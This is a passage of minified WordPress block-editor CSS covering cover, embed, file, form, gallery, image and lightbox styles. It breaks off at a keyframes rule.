.wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-right:0;text-align:right}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-left:0;text-align:left}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){color:inherit}body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__image-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__video-background{z-index:0}body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__gradient-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)).has-background-dim:not(.has-background-gradient):before{z-index:1}.has-modal-open body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container{z-index:auto}.wp-block-details{box-sizing:border-box}.wp-block-details summary{cursor:pointer}.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-right:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):where(a):active,:where(.wp-block-file__button):where(a):focus,:where(.wp-block-file__button):where(a):hover,:where(.wp-block-file__button):where(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}.wp-block-form-input__label{display:flex;flex-direction:column;gap:.25em;margin-bottom:.5em;width:100%}.wp-block-form-input__label.is-label-inline{align-items:center;flex-direction:row;gap:.5em}.wp-block-form-input__label.is-label-inline .wp-block-form-input__label-content{margin-bottom:.5em}.wp-block-form-input__label:has(input[type=checkbox]){flex-direction:row;width:fit-content}.wp-block-form-input__label:has(input[type=checkbox]) .wp-block-form-input__label-content{margin:0}.wp-block-form-input__label:has(.wp-block-form-input__label-content+input[type=checkbox]){flex-direction:row-reverse}.wp-block-form-input__label-content{width:fit-content}:where(.wp-block-form-input__input){font-size:1em;margin-bottom:.5em;padding:0 .5em}:where(.wp-block-form-input__input)[type=date],:where(.wp-block-form-input__input)[type=datetime-local],:where(.wp-block-form-input__input)[type=datetime],:where(.wp-block-form-input__input)[type=email],:where(.wp-block-form-input__input)[type=month],:where(.wp-block-form-input__input)[type=number],:where(.wp-block-form-input__input)[type=password],:where(.wp-block-form-input__input)[type=search],:where(.wp-block-form-input__input)[type=tel],:where(.wp-block-form-input__input)[type=text],:where(.wp-block-form-input__input)[type=time],:where(.wp-block-form-input__input)[type=url],:where(.wp-block-form-input__input)[type=week]{border-style:solid;border-width:1px;line-height:2;min-height:2em}textarea.wp-block-form-input__input{min-height:10em}.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 0 1em 1em;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-left:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-left:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-left:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-left:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-left:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-left:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-left:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-left:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-left:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-left:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{bottom:0;left:0;max-height:100%;position:absolute;right:0}.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{backdrop-filter:blur(3px);content:"";height:100%;-webkit-mask-image:linear-gradient(0deg,#000 20%,#0000);mask-image:linear-gradient(0deg,#000 20%,#0000);max-height:40%;pointer-events:none}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{box-sizing:border-box;color:#fff;font-size:13px;margin:0;overflow:auto;padding:1em;text-align:center;text-shadow:0 0 1.5px #000}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{height:12px;width:12px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{background-color:initial}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{background-color:#fffc}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{scrollbar-color:#fffc #0000}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{will-change:transform}@media (hover:none){.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#fffc #0000}}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,#0006,#0000)}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative;text-shadow:none}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border:before,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded:before{content:none}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-layout-constrained){position:relative}h1:where(.wp-block-heading).has-background,h2:where(.wp-block-heading).has-background,h3:where(.wp-block-heading).has-background,h4:where(.wp-block-heading).has-background,h5:where(.wp-block-heading).has-background,h6:where(.wp-block-heading).has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}.wp-block-image>a,.wp-block-image>figure>a{display:inline-block}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}@media not (prefers-reduced-motion){.wp-block-image img.hide{visibility:hidden}.wp-block-image img.show{animation:show-content-image .4s}}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull>a,.wp-block-image.alignwide>a{width:100%}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,');mask-image:url('data:image/svg+xml;utf8,');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){border-radius:9999px}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;backdrop-filter:blur(16px) saturate(180%);background-color:#5a5a5a40;border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;left:16px;opacity:0;padding:0;position:absolute;text-align:center;top:16px;width:20px;z-index:100}@media not (prefers-reduced-motion){.wp-lightbox-container button{transition:opacity .2s ease}}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40;outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:#5a5a5a40;border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;overflow:hidden;position:fixed;right:0;top:0;visibility:hidden;width:100%;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;left:calc(env(safe-area-inset-left) + 16px);min-height:40px;min-width:40px;padding:0;position:absolute;top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);overflow:hidden;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);transform-origin:top right;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:100% 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{visibility:visible}@media not (prefers-reduced-motion){.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active) img{animation:turn-off-visibility .25s both}.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes show-content-image{0%{visibility:hidden}99%{visibility:hidden}to{visibility:visible}}@keyframes 